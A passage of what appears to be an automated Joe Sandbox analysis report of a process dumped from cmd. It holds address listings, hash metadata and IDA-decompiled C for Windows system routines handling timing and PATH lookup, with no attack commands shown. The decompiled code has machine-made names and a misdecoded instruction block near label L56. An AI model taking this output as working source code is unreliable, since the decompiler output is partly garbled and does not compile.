                                                                                                                                          0x03c348e4
                                                                                                                                          0x03c348e7
                                                                                                                                          0x03c348e7
                                                                                                                                          0x03c348ed
                                                                                                                                          0x03c348f4
                                                                                                                                          0x03c348f6
                                                                                                                                          0x03c34951
                                                                                                                                          0x03c34951
                                                                                                                                          0x03c34953
                                                                                                                                          0x03c34953
                                                                                                                                          0x03c34956
                                                                                                                                          0x03c34956
                                                                                                                                          0x03c34958
                                                                                                                                          0x03c34959
                                                                                                                                          0x03c34959
                                                                                                                                          0x03c3495d
                                                                                                                                          0x03c3495d
                                                                                                                                          0x03c3495f
                                                                                                                                          0x03c3495f
                                                                                                                                          0x03c34965
                                                                                                                                          0x03c34969
                                                                                                                                          0x03c349ba
                                                                                                                                          0x03c349ba
                                                                                                                                          0x03c349c1
                                                                                                                                          0x03c349c5
                                                                                                                                          0x03c349cc
                                                                                                                                          0x03c349d4
                                                                                                                                          0x03c349d7
                                                                                                                                          0x03c349da
                                                                                                                                          0x03c349e4
                                                                                                                                          0x03c349e5
                                                                                                                                          0x03c349f3
                                                                                                                                          0x03c34a02
                                                                                                                                          0x00000000
                                                                                                                                          0x03c34a02
                                                                                                                                          0x03c34972
                                                                                                                                          0x03c34974
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c34976
                                                                                                                                          0x03c34979
                                                                                                                                          0x03c34982
                                                                                                                                          0x03c34983
                                                                                                                                          0x03c34984
                                                                                                                                          0x03c3498b
                                                                                                                                          0x03c3498d
                                                                                                                                          0x03c34991
                                                                                                                                          0x03c34993
                                                                                                                                          0x03c34999
                                                                                                                                          0x03c3499d
                                                                                                                                          0x03c349a2
                                                                                                                                          0x03c349a2
                                                                                                                                          0x03c349a2
                                                                                                                                          0x03c34999
                                                                                                                                          0x03c349ac
                                                                                                                                          0x00000000
                                                                                                                                          0x03c349b3
                                                                                                                                          0x03c348f8
                                                                                                                                          0x03c348fe
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c348fe
                                                                                                                                          0x03c34895
                                                                                                                                          0x03c3489c
                                                                                                                                          0x03c348ad
                                                                                                                                          0x03c348b2
                                                                                                                                          0x03c348b5
                                                                                                                                          0x03c348b7
                                                                                                                                          0x03c348ba
                                                                                                                                          0x03c348bc
                                                                                                                                          0x03c348c6
                                                                                                                                          0x03c348c6
                                                                                                                                          0x03c348cb
                                                                                                                                          0x03c348d1
                                                                                                                                          0x03c348d4
                                                                                                                                          0x03c348d8
                                                                                                                                          0x03c348d8
                                                                                                                                          0x00000000
                                                                                                                                          0x03c348d8
                                                                                                                                          0x03c348be
                                                                                                                                          0x03c348c0
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c348c2
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c348c4
                                                                                                                                          0x00000000
                                                                                                                                          0x03c34882
                                                                                                                                          0x03c3487b
                                                                                                                                          0x03c34904
                                                                                                                                          0x03c34906
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c34908
                                                                                                                                          0x03c3490e
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c34910
                                                                                                                                          0x03c34917
                                                                                                                                          0x03c34917
                                                                                                                                          0x00000000
                                                                                                                                          0x03c34917
                                                                                                                                          0x03bdb1ba
                                                                                                                                          0x03c347f9
                                                                                                                                          0x03c347fc
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c347fc
                                                                                                                                          0x03bdb1c0
                                                                                                                                          0x03bdb1c0
                                                                                                                                          0x03bdb1c3
                                                                                                                                          0x03bdb1cb
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _vswprintf_s
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 677850445-0
                                                                                                                                          • Opcode ID: e57eb3e3095b2862e6d2abb99bfea50e9d1472626278b2e7bba9ce5cb348f9ac
                                                                                                                                          • Instruction ID: 10d7a578e7f60cdf6515caaa65adc165de5a9d1b9718e124d7593a6a9d0956e3
                                                                                                                                          • Opcode Fuzzy Hash: e57eb3e3095b2862e6d2abb99bfea50e9d1472626278b2e7bba9ce5cb348f9ac
                                                                                                                                          • Instruction Fuzzy Hash: 9B51FF76D043698EDB38CF69C844BAEBBB4FF06310F1541ADD859EF281D7704A819B91
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03BFB944 Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 76%
                                                                                                                                          			E03BFB944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x3ccd360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E03BF7D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E03CA8CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E03C19E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E03C1B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E03C1CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E03BF7D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E03CA8F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E03C1AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x3cc8628; // 0x0
								_v68 = _t77;
								_t78 =  *0x3cc862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x3cc8628; // 0x0
							_t116 =  *0x3cc862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                                                                                                                          0x03bfb94c
                                                                                                                                          0x03bfb956
                                                                                                                                          0x03bfb95c
                                                                                                                                          0x03bfb95e
                                                                                                                                          0x03bfb964
                                                                                                                                          0x03bfb969
                                                                                                                                          0x03bfb96d
                                                                                                                                          0x03bfb96d
                                                                                                                                          0x03bfb970
                                                                                                                                          0x03bfb974
                                                                                                                                          0x03bfb97a
                                                                                                                                          0x03bfbadf
                                                                                                                                          0x03bfbadf
                                                                                                                                          0x03bfbae2
                                                                                                                                          0x03bfbae4
                                                                                                                                          0x03bfbae6
                                                                                                                                          0x03bfbaf0
                                                                                                                                          0x03c42cb8
                                                                                                                                          0x03bfbaf6
                                                                                                                                          0x03bfbaf6
                                                                                                                                          0x03bfbaf6
                                                                                                                                          0x03bfbafd
                                                                                                                                          0x03bfbb1f
                                                                                                                                          0x03bfbb1f
                                                                                                                                          0x03bfbaff
                                                                                                                                          0x03bfbb00
                                                                                                                                          0x03bfbb00
                                                                                                                                          0x03bfbb03
                                                                                                                                          0x03bfbb03
                                                                                                                                          0x03bfbacb
                                                                                                                                          0x03bfbacf
                                                                                                                                          0x03bfbad0
                                                                                                                                          0x03bfbad1
                                                                                                                                          0x03bfbadc
                                                                                                                                          0x03bfbadc
                                                                                                                                          0x03bfb980
                                                                                                                                          0x03bfb980
                                                                                                                                          0x03bfb988
                                                                                                                                          0x03bfb98b
                                                                                                                                          0x03bfb98d
                                                                                                                                          0x03bfb990
                                                                                                                                          0x03bfb993
                                                                                                                                          0x03bfb999
                                                                                                                                          0x03bfb99b
                                                                                                                                          0x03bfb9a1
                                                                                                                                          0x03bfb9a5
                                                                                                                                          0x03bfb9aa
                                                                                                                                          0x03bfb9b0
                                                                                                                                          0x03bfb9bb
                                                                                                                                          0x03bfb9c0
                                                                                                                                          0x03bfb9c3
                                                                                                                                          0x03bfb9ca
                                                                                                                                          0x03bfb9cc
                                                                                                                                          0x03bfb9cf
                                                                                                                                          0x03bfb9d3
                                                                                                                                          0x03bfb9d7
                                                                                                                                          0x03bfba94
                                                                                                                                          0x03bfba94
                                                                                                                                          0x03bfba98
                                                                                                                                          0x03bfbaa3
                                                                                                                                          0x03c42ccb
                                                                                                                                          0x03bfbaa9
                                                                                                                                          0x03bfbaa9
                                                                                                                                          0x03bfbaa9
                                                                                                                                          0x03bfbab1
                                                                                                                                          0x03c42cd5
                                                                                                                                          0x03c42cdd
                                                                                                                                          0x03c42cdd
                                                                                                                                          0x03bfbabb
                                                                                                                                          0x03bfbabc
                                                                                                                                          0x03bfbac2
                                                                                                                                          0x03bfbac3
                                                                                                                                          0x03bfbac3
                                                                                                                                          0x03bfbac6
                                                                                                                                          0x00000000
                                                                                                                                          0x03bfb9dd
                                                                                                                                          0x03bfb9dd
                                                                                                                                          0x03bfb9e7
                                                                                                                                          0x03bfb9e7
                                                                                                                                          0x03bfb9ec
                                                                                                                                          0x03bfb9ec
                                                                                                                                          0x03bfb9f1
                                                                                                                                          0x03bfb9f5
                                                                                                                                          0x03bfb9fa
                                                                                                                                          0x03bfba00
                                                                                                                                          0x03bfba0c
                                                                                                                                          0x03bfba10
                                                                                                                                          0x03bfba10
                                                                                                                                          0x03bfba12
                                                                                                                                          0x03bfba18
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bfbb26
                                                                                                                                          0x03bfbb26
                                                                                                                                          0x03bfba1e
                                                                                                                                          0x03bfba1e
                                                                                                                                          0x03bfba23
                                                                                                                                          0x03bfba25
                                                                                                                                          0x03bfba2c
                                                                                                                                          0x03bfba30
                                                                                                                                          0x03bfba35
                                                                                                                                          0x03bfba35
                                                                                                                                          0x03bfba41
                                                                                                                                          0x03bfba46
                                                                                                                                          0x03bfba4c
                                                                                                                                          0x03bfba50
                                                                                                                                          0x03bfba54
                                                                                                                                          0x03bfba6a
                                                                                                                                          0x03bfba6e
                                                                                                                                          0x03bfba70
                                                                                                                                          0x03bfba74
                                                                                                                                          0x03bfba78
                                                                                                                                          0x03bfba7a
                                                                                                                                          0x03bfba7c
                                                                                                                                          0x03bfba8e
                                                                                                                                          0x03bfba90
                                                                                                                                          0x03bfba92
                                                                                                                                          0x03bfbb14
                                                                                                                                          0x03bfbb14
                                                                                                                                          0x03bfbb16
                                                                                                                                          0x03bfbb16
                                                                                                                                          0x00000000
                                                                                                                                          0x03bfba7c
                                                                                                                                          0x03bfbb0a
                                                                                                                                          0x03bfbb0d
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bfbb0f

                                                                                                                                          APIs
                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03BFB9A5
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 885266447-0
                                                                                                                                          • Opcode ID: 2b7c839cf574dc1b5600fbd2e14f03e7a889573b2875d28a2072593977102480
                                                                                                                                          • Instruction ID: 836ea72c4ceee47d2dd2133b10bc0355a8270762a88d0b9f26b361140feb2dc3
                                                                                                                                          • Opcode Fuzzy Hash: 2b7c839cf574dc1b5600fbd2e14f03e7a889573b2875d28a2072593977102480
                                                                                                                                          • Instruction Fuzzy Hash: 21514C75604341CFC720DF29C48092AFBE9FB88658F1599AEF695C7354DB31E848CB92
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C02581 Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 81%
                                                                                                                                          			E03C02581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				void* _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t228;
				signed int _t232;
				signed int _t244;
				signed int _t246;
				intOrPtr _t248;
				signed int _t251;
				signed int _t258;
				signed int _t261;
				signed int _t269;
				signed int _t271;
				intOrPtr _t276;
				signed int _t278;
				signed int _t280;
				void* _t282;
				signed int _t283;
				unsigned int _t286;
				signed int _t290;
				signed int _t293;
				signed int _t297;
				intOrPtr _t309;
				signed int _t318;
				signed int _t320;
				signed int _t321;
				signed int _t325;
				signed int _t326;
				void* _t328;
				signed int _t329;
				signed int _t331;
				signed int _t333;
				void* _t334;
				void* _t338;
				void* _t339;

				_t331 = _t333;
				_t334 = _t333 - 0x4c;
				_v8 =  *0x3ccd360 ^ _t331;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t325 = 0x3ccb2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t286 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t339 = (_v24 >> 0x0000001c & 0x00000003) - 1;
				_t276 = 0x48;
				_t307 = 0 | _t339 == 0x00000000;
				_t318 = 0;
				_v37 = _t339 == 0;
				if(_v48 <= 0) {
					L16:
					_t45 = _t276 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t326 = 0xc0000106;
						goto L32;
					} else {
						_t325 = L03BF4620(_t286,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t276);
						_v52 = _t325;
						__eflags = _t325;
						if(_t325 == 0) {
							_t326 = 0xc0000017;
							goto L32;
						} else {
							 *(_t325 + 0x44) =  *(_t325 + 0x44) & 0x00000000;
							_t50 = _t325 + 0x48; // 0x48
							_t320 = _t50;
							_t307 = _v32;
							 *((intOrPtr*)(_t325 + 0x3c)) = _t276;
							_t278 = 0;
							 *((short*)(_t325 + 0x30)) = _v48;
							__eflags = _t307;
							if(_t307 != 0) {
								 *(_t325 + 0x18) = _t320;
								__eflags = _t307 - 0x3cc8478;
								 *_t325 = ((0 | _t307 == 0x03cc8478) - 0x00000001 & 0xfffffffb) + 7;
								E03C1F3E0(_t320,  *((intOrPtr*)(_t307 + 4)),  *_t307 & 0x0000ffff);
								_t307 = _v32;
								_t334 = _t334 + 0xc;
								_t278 = 1;
								__eflags = _a8;
								_t320 = _t320 + (( *_t307 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t269 = E03C639F2(_t320);
									_t307 = _v32;
									_t320 = _t269;
								}
							}
							_t290 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t326 = _v68;
								__eflags = 0;
								 *((short*)(_t320 - 2)) = 0;
								goto L32;
							} else {
								_t280 = _t325 + _t278 * 4;
								_v56 = _t280;
								do {
									__eflags = _t307;
									if(_t307 != 0) {
										_t228 =  *(_v60 + _t290 * 4);
										__eflags = _t228;
										if(_t228 == 0) {
											goto L30;
										} else {
											__eflags = _t228 == 5;
											if(_t228 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t280 =  *(_v60 + _t290 * 4);
										 *(_t280 + 0x18) = _t320;
										_t232 =  *(_v60 + _t290 * 4);
										__eflags = _t232 - 8;
										if(_t232 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t232 * 4 +  &M03C02959))) {
												case 0:
													__ax =  *0x3cc8488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E03C1F3E0(__edi,  *0x3cc848c, __ax & 0x0000ffff);
														__eax =  *0x3cc8488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E03C1F3E0(_t320, _v80, _v64);
													_t264 = _v64;
													goto L26;
												case 2:
													 *0x3cc8480 & 0x0000ffff = E03C1F3E0(__edi,  *0x3cc8484,  *0x3cc8480 & 0x0000ffff);
													__eax =  *0x3cc8480 & 0x0000ffff;
													__eax = ( *0x3cc8480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E03C1F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E03C1F3E0(_t320, _v76, _v36);
														_t264 = _v36;
													}
													L26:
													_t334 = _t334 + 0xc;
													_t320 = _t320 + (_t264 >> 1) * 2 + 2;
													__eflags = _t320;
													L27:
													_push(0x3b);
													_pop(_t266);
													 *((short*)(_t320 - 2)) = _t266;
													goto L28;
												case 6:
													__ebx = "\\WWw\\WWw";
													__eflags = __ebx - "\\WWw\\WWw";
													if(__ebx != "\\WWw\\WWw") {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E03C1F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - "\\WWw\\WWw";
														} while (__ebx != "\\WWw\\WWw");
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x3cc8478 & 0x0000ffff = E03C1F3E0(__edi,  *0x3cc847c,  *0x3cc8478 & 0x0000ffff);
													__eax =  *0x3cc8478 & 0x0000ffff;
													__eax = ( *0x3cc8478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E03C639F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x3cc6e58 & 0x0000ffff = E03C1F3E0(__edi,  *0x3cc6e5c,  *0x3cc6e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x3cc6e58 & 0x0000ffff;
													__eax = ( *0x3cc6e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t290 = _v16;
													_t307 = _v32;
													L29:
													_t280 = _t280 + 4;
													__eflags = _t280;
													_v56 = _t280;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t290 = _t290 + 1;
									_v16 = _t290;
									__eflags = _t290 - _v48;
								} while (_t290 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t271 =  *(_v60 + _t318 * 4);
						if(_t271 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t271 * 4 +  &M03C02935))) {
							case 0:
								__ax =  *0x3cc8488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t307 =  &_v64;
								_v80 = E03C02E3E(0,  &_v64);
								_t276 = _t276 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x3cc8480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x3cc8480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E03BEEEF0(0x3cc79a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E03BEEB70(__ecx, 0x3cc79a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t206 = _v72;
											__eflags = _t206;
											if(_t206 != 0) {
												L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t206);
											}
											_t207 = _v52;
											__eflags = _t207;
											if(_t207 != 0) {
												__eflags = _t326;
												if(_t326 < 0) {
													L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t207);
													_t207 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t286 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x3cc7b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L03BF4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E03BEEB70(__ecx, 0x3cc79a0);
										__eax = _v52;
										L36:
										_pop(_t319);
										_pop(_t327);
										__eflags = _v8 ^ _t331;
										_pop(_t277);
										return E03C1B640(_t207, _t277, _v8 ^ _t331, _t307, _t319, _t327);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t272 = _v56;
								if(_v56 != 0) {
									_t307 =  &_v36;
									_t274 = E03C02E3E(_t272,  &_v36);
									_t286 = _v36;
									_v76 = _t274;
								}
								if(_t286 == 0) {
									goto L44;
								} else {
									_t276 = _t276 + 2 + _t286;
								}
								goto L14;
							case 6:
								__eax =  *0x3cc5764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x3cc8478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x3cc8478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x3cc6e58 & 0x0000ffff;
								__eax = ( *0x3cc6e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t318 = _t318 + 1;
								if(_t318 >= _v48) {
									goto L16;
								} else {
									_t307 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					asm("int 0x29");
					asm("out 0x28, al");
					asm("rol byte [ebx], 0x66");
					asm("daa");
					asm("rol byte [ebx], 0x2e");
					asm("rol byte [es:ebx], 0x46");
					asm("les eax, [ebx]");
					_t328 = _t325 +  *0x203c45b;
					asm("daa");
					asm("rol byte [ebx], 0x1e");
					asm("rol byte [ebx], 0x5d");
					asm("daa");
					asm("rol byte [ebx], 0xd8");
					_t282 = 0x25;
					asm("les eax, [ebx]");
					asm("rol byte [ebx], 0x34");
					_pop(_t338);
					asm("les eax, [ebx]");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x3caff00);
					E03C2D08C(_t282, _t320, _t328);
					_v44 =  *[fs:0x18];
					_t321 = 0;
					 *_a24 = 0;
					_t283 = _a12;
					__eflags = _t283;
					if(_t283 == 0) {
						_t244 = 0xc0000100;
					} else {
						_v8 = 0;
						_t329 = 0xc0000100;
						_v52 = 0xc0000100;
						_t246 = 4;
						while(1) {
							_v40 = _t246;
							__eflags = _t246;
							if(_t246 == 0) {
								break;
							}
							_t297 = _t246 * 0xc;
							_v48 = _t297;
							__eflags = _t283 -  *((intOrPtr*)(_t297 + 0x3bb1664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t261 = E03C1E5C0(_a8,  *((intOrPtr*)(_t297 + 0x3bb1668)), _t283);
									_t338 = _t338 + 0xc;
									__eflags = _t261;
									if(__eflags == 0) {
										_t329 = E03C551BE(_t283,  *((intOrPtr*)(_v48 + 0x3bb166c)), _a16, _t321, _t329, __eflags, _a20, _a24);
										_v52 = _t329;
										break;
									} else {
										_t246 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t246 = _t246 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t329;
						__eflags = _t329;
						if(_t329 < 0) {
							__eflags = _t329 - 0xc0000100;
							if(_t329 == 0xc0000100) {
								_t293 = _a4;
								__eflags = _t293;
								if(_t293 != 0) {
									_v36 = _t293;
									__eflags =  *_t293 - _t321;
									if( *_t293 == _t321) {
										_t329 = 0xc0000100;
										goto L76;
									} else {
